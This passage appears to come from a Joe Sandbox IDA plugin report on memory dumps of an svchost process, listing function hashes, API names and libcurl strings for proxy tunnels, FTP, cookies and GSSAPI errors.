                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID: CONNECT need to close+open$CONNECT phase completed$CONNECT receive$CONNECT response$CONNECT send$CONNECT start$CONNECT tunnel established, response %d$CONNECT tunnel failed, response %d$Connect me again please$Establish HTTP proxy tunnel to %s$Failed sending CONNECT to proxy$Proxy CONNECT aborted due to timeout$new tunnel state 'connect'$new tunnel state 'established'$new tunnel state 'failed'$new tunnel state 'init'$new tunnel state 'receive'$new tunnel state 'response'
                                                                                                                                                                                • API String ID: 1294909896-470889996
                                                                                                                                                                                • Opcode ID: 3e2fd6da830d4a10d5a3d25be823ab0a56159012e48882af28cd82a453307fbf
                                                                                                                                                                                • Instruction ID: 668bdca957c1602fd67cd639778d9ec7180de77faa4d14d585f84f3db3897551
                                                                                                                                                                                • Opcode Fuzzy Hash: 3e2fd6da830d4a10d5a3d25be823ab0a56159012e48882af28cd82a453307fbf
                                                                                                                                                                                • Instruction Fuzzy Hash: B3E15066A0878285EAA4DF2DA8147BAB791EB4DBC4F4C4031DB8E07785DF3DE546C708
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memmove$strtoul$_time64strspn
                                                                                                                                                                                • String ID: "$,$0123456789abcdefABCDEF:.$:$=$Added alt-svc: %s:%d over %s$Excessive alt-svc header, ignoring.$Excessive alt-svc hostname, ignoring.$Unknown alt-svc port number, ignoring.$clear$persist
                                                                                                                                                                                • API String ID: 2558740077-421930099
                                                                                                                                                                                • Opcode ID: 19a8ed73860ff683781c41c0aa68f1c94de6573c5c9f118650bca49668444dd2
                                                                                                                                                                                • Instruction ID: 15feb1d4481b55c0830e59213e825b86677842c7356b56965f780f33074201fe
                                                                                                                                                                                • Opcode Fuzzy Hash: 19a8ed73860ff683781c41c0aa68f1c94de6573c5c9f118650bca49668444dd2
                                                                                                                                                                                • Instruction Fuzzy Hash: B112D352A0C69646FB618A2DD4503BEF7E2AB497C4F4C0032DB8E476DADF2CE5478718
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strdup$free$strtoul$strchr
                                                                                                                                                                                • String ID: %u.%u.%u.%u$Bad PASV/EPSV response: %03d$Connecting to %s (%s) port %d$Couldn't interpret the 227-response$Illegal port number in EPSV reply$Skip %u.%u.%u.%u for data connection, reuse %s instead$Weirdly formatted EPSV reply$cannot resolve new host %s:%hu$cannot resolve proxy host %s:%hu
                                                                                                                                                                                • API String ID: 1104023992-4292487287
                                                                                                                                                                                • Opcode ID: 9c7bfb66095640c189312f4b9d4ebe2c4e47a50d623862ad8daaef9831f82f74
                                                                                                                                                                                • Instruction ID: fa8fb29b38a47ccf767e72ee533601197cd40dac6d228e9251d234177738752d
                                                                                                                                                                                • Opcode Fuzzy Hash: 9c7bfb66095640c189312f4b9d4ebe2c4e47a50d623862ad8daaef9831f82f74
                                                                                                                                                                                • Instruction Fuzzy Hash: A4D10926B0D68292EB658B29A5106B9BBA0FF8D7C8F084035DB8D07755CF3CF562C708
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: setlocale$strcmpstrlen
                                                                                                                                                                                • String ID: _
                                                                                                                                                                                • API String ID: 3672321321-701932520
                                                                                                                                                                                • Opcode ID: 093befc57d05f290bc341a004cf99ce45b6b10a2a4c87869a066492637149da6
                                                                                                                                                                                • Instruction ID: bb44e0de26bf85c71b238b67b84ca6518bbae0052568d87d8f6fc6d2fa8fb069
                                                                                                                                                                                • Opcode Fuzzy Hash: 093befc57d05f290bc341a004cf99ce45b6b10a2a4c87869a066492637149da6
                                                                                                                                                                                • Instruction Fuzzy Hash: B481F3A670868D86DF11CB16E50036AA762F78ABC8FC4851ADFAD17B98DF38D549C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID: ???$ABOR$Exceeded storage allocation$Failure sending ABOR command: %s$N$No data was received$Received only partial file: %lld bytes$Remembering we are in dir "%s"$Uploaded unaligned file size (%lld out of %lld bytes)$[%s] closing DATA connection$[%s] done, result=%d$control connection looks dead$partial download completed, closing connection$server did not report OK, got %d
                                                                                                                                                                                • API String ID: 1294909896-1677199900
                                                                                                                                                                                • Opcode ID: 08bfa4fe46a1e4b3d733bccec3f0ad27ae3c34fb3c9131e050eb44a4459c85b0
                                                                                                                                                                                • Instruction ID: 3f9caaa1f0b38a61ebc4d98ca1d594b35ea5d388e34c00bb302bf572c56c5578
                                                                                                                                                                                • Opcode Fuzzy Hash: 08bfa4fe46a1e4b3d733bccec3f0ad27ae3c34fb3c9131e050eb44a4459c85b0
                                                                                                                                                                                • Instruction Fuzzy Hash: 32E1CF26A0C68285EB749B2D9550BF92BA0EF4DBD8F4C0135CB6D076D1CF3CE5968348
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: freeinflate$malloc
                                                                                                                                                                                • String ID: 1.3.1$Error while processing content unencoding: %s$Error while processing content unencoding: Unknown failure within decompression software.
                                                                                                                                                                                • API String ID: 1643254926-2669389255
                                                                                                                                                                                • Opcode ID: 46eed44285381f4e9dc0d6e4a6586542a9c083b65d59cbbf70b4d4a85d326a77
                                                                                                                                                                                • Instruction ID: 8831cf103a87285534a83a2f991895de24f70ba8fbb7ef22200dd6a2885263f7
                                                                                                                                                                                • Opcode Fuzzy Hash: 46eed44285381f4e9dc0d6e4a6586542a9c083b65d59cbbf70b4d4a85d326a77
                                                                                                                                                                                • Instruction Fuzzy Hash: 4C912D72A0866297E6648B2DE94436973A0FB0C795F580235DB4D47A90DF3CF8BAC708
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: GSSAPI handshake failure (empty security message)$GSSAPI handshake failure (invalid security data)$GSSAPI handshake failure (invalid security layer)
                                                                                                                                                                                • API String ID: 0-3320144510
                                                                                                                                                                                • Opcode ID: 531d2d96cff6da66d7146cd4b1d79e1bda5094a1bec456a5567fc9efc61e7034
                                                                                                                                                                                • Instruction ID: e4ce6c25cf633b8f31ed9f26ae9e3e739a540c522fe6009bc064d3f7a1814310
                                                                                                                                                                                • Opcode Fuzzy Hash: 531d2d96cff6da66d7146cd4b1d79e1bda5094a1bec456a5567fc9efc61e7034
                                                                                                                                                                                • Instruction Fuzzy Hash: E2A15CA2B09A468AFB50DF69D4502BD37B1AB48BD8F084135DF0E57B95DF3CA40AC744
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Name::operator+$Replicator::operator[]
                                                                                                                                                                                • String ID: `anonymous namespace'
                                                                                                                                                                                • API String ID: 3863519203-3062148218
                                                                                                                                                                                • Opcode ID: daba2b19d2dabbd3eefe1ff6b139602022a68927245a1286b1b46fa7674a2808
                                                                                                                                                                                • Instruction ID: 8174bc121f50a9d3f9428b40d8e754abcd3784722e9cca9321791a0435d1f904
                                                                                                                                                                                • Opcode Fuzzy Hash: daba2b19d2dabbd3eefe1ff6b139602022a68927245a1286b1b46fa7674a2808
                                                                                                                                                                                • Instruction Fuzzy Hash: 33E18B72A0AB86A6EB10DF74E4901AC7BA0FB857C4F544036DB4D17B59EF38E654D700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$_strdup$strchr
                                                                                                                                                                                • String ID: %s cookie %s="%s" for domain %s, path %s, expire %lld$Added$FALSE$Replaced
                                                                                                                                                                                • API String ID: 1029395139-636008438
                                                                                                                                                                                • Opcode ID: 8251da88bc52f82964565a0c4c8f7829f00f54be7f23499df754b3421f9e9d85
                                                                                                                                                                                • Instruction ID: 38f83be1694cba1393a15a4130776b753ce963093ed159d63c910a213aaaca18
                                                                                                                                                                                • Opcode Fuzzy Hash: 8251da88bc52f82964565a0c4c8f7829f00f54be7f23499df754b3421f9e9d85
                                                                                                                                                                                • Instruction Fuzzy Hash: FCD17A22A0DB8286EFA58B2D9554379A7A0EF5D7C8F0C1135CF4D43695EF3DE4A28308
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strdup
                                                                                                                                                                                • String ID: %s cookie %s="%s" for domain %s, path %s, expire %lld$Added$FALSE$Replaced$__Host-$__Secure-
                                                                                                                                                                                • API String ID: 1169197092-2346715698
                                                                                                                                                                                • Opcode ID: 097d6488f659e24e89ecd6f3541ff558466062ee67193b6e0e54c48e377dcad0
                                                                                                                                                                                • Instruction ID: ca9c91b12875d2132989cc365bb064876f9620be3865021da8b71f89efa2ee15
                                                                                                                                                                                • Opcode Fuzzy Hash: 097d6488f659e24e89ecd6f3541ff558466062ee67193b6e0e54c48e377dcad0
                                                                                                                                                                                • Instruction Fuzzy Hash: C6C16B22A0DB8286EBA58B2DD55437967A0EF4C7C8F0C5135CF4D43695EF7DE4A28308
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$_strdup$memcmp
                                                                                                                                                                                • String ID: Added Session ID to cache for %s://%s:%d [%s]$Failed to add Session ID to cache for %s://%s:%d [%s]$PROXY$server
                                                                                                                                                                                • API String ID: 3255066042-728548592
                                                                                                                                                                                • Opcode ID: 4efca596ed1fa788cc5864fbb807b282907df59b421b373e63d02b60853fa335
                                                                                                                                                                                • Instruction ID: b5bdc66529fd8d6810f150a21b403da34262e6212fbe728ac97dbb413a603095
                                                                                                                                                                                • Opcode Fuzzy Hash: 4efca596ed1fa788cc5864fbb807b282907df59b421b373e63d02b60853fa335
                                                                                                                                                                                • Instruction Fuzzy Hash: 2DB13772A09B8186EB64CF29E45436A73A4FB89BC8F584132DB4D43758CF3CE45ACB44
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _errnorealloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3650671883-0
                                                                                                                                                                                • Opcode ID: bdd0e6abeca3baa7d21ed68e019c67173be07a59379de568f70bcf34bb2b9ef9
                                                                                                                                                                                • Instruction ID: e6ee4a582ad34783fbcadd2d6336356e8e1fd09c990db6dfb05e23014d8f1b0d
                                                                                                                                                                                • Opcode Fuzzy Hash: bdd0e6abeca3baa7d21ed68e019c67173be07a59379de568f70bcf34bb2b9ef9
                                                                                                                                                                                • Instruction Fuzzy Hash: 2671EEB274568D8ADF14DF6AC4547A937A1BB09BDDFC04A22DE7A47BD4DB38C0898300
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _errnorealloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3650671883-0
                                                                                                                                                                                • Opcode ID: f8ee91569c2ea8d9f96b9a375bb53b20452bceb955b8ba2ed58fdad426acd86c
                                                                                                                                                                                • Instruction ID: fd340a8f04ad75a795b516fee64edffc07a6c3742d38dac7595fad0a1437b1ae
                                                                                                                                                                                • Opcode Fuzzy Hash: f8ee91569c2ea8d9f96b9a375bb53b20452bceb955b8ba2ed58fdad426acd86c
                                                                                                                                                                                • Instruction Fuzzy Hash: 3B71D3A270164D8ADF14CF6AD0547AD37A1FB09799FC04A25CE7A67BD4EF38C0898741
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • %s, xrefs: 00007FF8B837106D
                                                                                                                                                                                • # Netscape HTTP Cookie File# https://curl.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00007FF8B8370D18
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __acrt_iob_funccallocfputs
                                                                                                                                                                                • String ID: # Netscape HTTP Cookie File# https://curl.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$%s
                                                                                                                                                                                • API String ID: 1201625019-959389649
                                                                                                                                                                                • Opcode ID: f93b11ddaa25fb85eac3f19fc192c3c8751b85d217da19adaae4b7107a9fce75
                                                                                                                                                                                • Instruction ID: edcaf9f3b227d435fe4ca2b4ecbd727eb568eb1225e45b003869ee004846b536
                                                                                                                                                                                • Opcode Fuzzy Hash: f93b11ddaa25fb85eac3f19fc192c3c8751b85d217da19adaae4b7107a9fce75
                                                                                                                                                                                • Instruction Fuzzy Hash: 63E12E66A1AB4981EE608F09D450A79BBA4FB5CB98F4C0539CB5D43360EF3CF462C718
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strdup$strchr
                                                                                                                                                                                • String ID: %s cookie %s="%s" for domain %s, path %s, expire %lld$Added$FALSE$Replaced
